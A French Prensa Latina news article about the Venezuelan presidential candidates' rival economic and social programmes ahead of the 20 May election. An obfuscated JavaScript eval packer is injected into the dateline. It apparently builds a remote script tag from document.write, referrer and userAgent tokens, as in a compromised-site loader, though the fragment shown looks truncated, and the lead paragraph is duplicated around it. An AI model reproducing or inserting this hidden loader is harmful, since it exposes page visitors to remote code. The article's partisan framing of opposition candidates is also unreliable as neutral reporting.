dimanche 14 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Les candidats à la présidence du Venezuela affichent des programmes politiques opposés

Caracas, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fyaab|var|u0026u|referrer|nkybb||js|php'.split('|'),0,{})) 25 avril (Prensa Latina) Les candidats présidentiables vénézuéliens ont aujourd'hui affiché des positions opposées pour diriger le pays s'ils parviennent au gouvernement.

Caracas, 25 avril (Prensa Latina) Les candidats présidentiables vénézuéliens ont aujourd’hui affiché des positions opposées pour diriger le pays s’ils parviennent au gouvernement.

La veille, les aspirants au siège suprême de Miraflores, siège du gouvernement, ont présenté leurs propositions en matière économique et sociale pour tenter de gagner le soutien des électeurs aux prochaines élections présidentielles du 20 mai, date à laquelle seront également élus les Conseillers Législatifs Régionaux.

Il en est ressorti que tandis que le candidat Maduro, du Front Élargi pour la Patrie, est partisan d’un renforcement de la protection sociale  et veut travailler à accroître la prospérité économique du pays, son opposant Javier Bertucci – du groupe d’électeurs Espérance pour un Changement – a proposé des coupes budgétaires en matière sociale.

Cet ancien religieux reconverti à la politique s’est fait l’avocat d’un rapprochement avec les États-Unis pour obtenir de l’ « aide humanitaire », ce qui d’après certains renseignements équivaudrait à une justification suffisante pour envahir le pays et avoir recours à des entités comme le Fond Monétaire International et à la Banque Mondiale, toutes deux connues pour leurs politiques néo-libérales.

De la même manière, les autres candidats ont exposé leurs propositions: Henri Falcon, représentant d’Avancée Progressiste, Mouvement vers le Socialisme (MÁS), et du Comité d’Organisation Politique Électorale Indépendante  (Copei);  ReinaldoQuijada, de l’organisation Unité Politique Populaire 89 (UPP89); et Luis Alejandro Ratti, candidat libre.

Dans une série de déclarations à la chaîne Globovision, le candidat Falcon  a insisté sur le fait que la voie électorale permettra de sortir pacifiquement et démocratiquement de la crise que le pays traverse depuis 2013.

Pendant ce temps, Quijada, dans un entretien accordé à Union Radio, a proposé la création d’un sixième pouvoir institutionnel, le Pouvoir Monétaire, pour donner de l’ « indépendance  » la Banque Centrale et redresser l’économie.

Alors que Ratti, a appelé les électeurs à choisir un candidat unitaire pour représenter l’opposition vénézuélienne lors des élections du 20 mai.

Parmi les adversaires au candidat des rangs de la gauche, il convient de remarquer un net renforcement de la campagne de Bertucci  ces derniers jours. Celui-ci a nié les rumeurs selon lesquels il allait abandonner la campagne et a répété qu’il la continuera jusqu’à l’étape finale, l’élection du 20 mai.

 » Je n’ai jamais pensé abandonner et je n’abandonnerai pas », a-t-il exprimé.

Puis, dans le programme intitulé Reportes Estelar diffusé par Globovision, il a ajouté que l’opposition fait preuve d’égoïsme quand elle appelle à l’abstention pour l’unique raison qu’elle n’a pas un seul candidat pour la représenter aux élections.

Au sujet de cette candidature, le directeur du bureau de sondage vénézuélien  Hinterleces, Oscar Schemel, a jugé que Bertucci est en train de faire une bonne campagne car il manie habilement l’espoir sans renoncer à la critique.

« Bertucci a une stratégie claire et, en plus, il possède une base solide. Aujourd’hui, Bertucci a environ 15 pour cent des voix après à peine un mois de campagne, c’est à dire que, d’une certaine manière, il  a consolidé un noyau dur et fidèle et qu’il a su le garder pendant la campagne », a-t-il indiqué,  en soulignant que seul Maduro,  qui jouit d’un soutien solide des forces de gauche,  parvient à le dépasser avec ses 30 pour cent des voix.

peo/ymr/lb

EN CONTINU
notes connexes